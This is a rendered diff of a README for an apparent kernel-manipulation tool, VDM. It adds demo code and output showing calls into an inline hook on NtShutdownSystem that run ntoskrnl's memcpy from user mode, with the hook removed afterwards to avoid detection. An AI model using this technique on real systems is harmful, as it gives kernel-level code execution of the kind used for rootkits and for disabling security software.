|
|
|
|
@ -14,6 +14,7 @@ but is removed after every syscall into NtShutdownSystem to prevent possible det
|
|
|
|
|
|
|
|
|
|
In this example VDM syscalls into an inline hook placed on NtShutdownSystem to call memcpy exported from ntoskrnl.exe.
|
|
|
|
|
|
|
|
|
|
#### Demo Code
|
|
|
|
|
```cpp
|
|
|
|
|
vdm::vdm_ctx vdm;
|
|
|
|
|
const auto ntoskrnl_base =
|
|
|
|
|
@ -29,11 +30,24 @@ In this example VDM syscalls into an inline hook placed on NtShutdownSystem to c
|
|
|
|
|
std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy);
|
|
|
|
|
|
|
|
|
|
short mz_bytes = 0;
|
|
|
|
|
vdm.syscall<decltype(&memcpy)>(ntoskrnl_memcpy, &mz_bytes, ntoskrnl_base, sizeof mz_bytes);
|
|
|
|
|
vdm.syscall<decltype(&memcpy)>(
|
|
|
|
|
ntoskrnl_memcpy,
|
|
|
|
|
&mz_bytes,
|
|
|
|
|
ntoskrnl_base,
|
|
|
|
|
sizeof mz_bytes
|
|
|
|
|
);
|
|
|
|
|
std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Demo Code Result
|
|
|
|
|
```
|
|
|
|
|
[+] drv_handle -> 0x70, drv_key -> frAQBc8Wsa1xVPfv
|
|
|
|
|
[+] NtShutdownSystem physical address -> 0x00000000109BB3A0
|
|
|
|
|
[+] ntoskrnl base address -> 0xFFFFF80075200000
|
|
|
|
|
[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980
|
|
|
|
|
[+] kernel MZ -> 0x5a4d
|
|
|
|
|
[+] press any key to close...
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# Usage
|
|
|
|
|
|
|
|
|
|
|
_xeroxz
4 years ago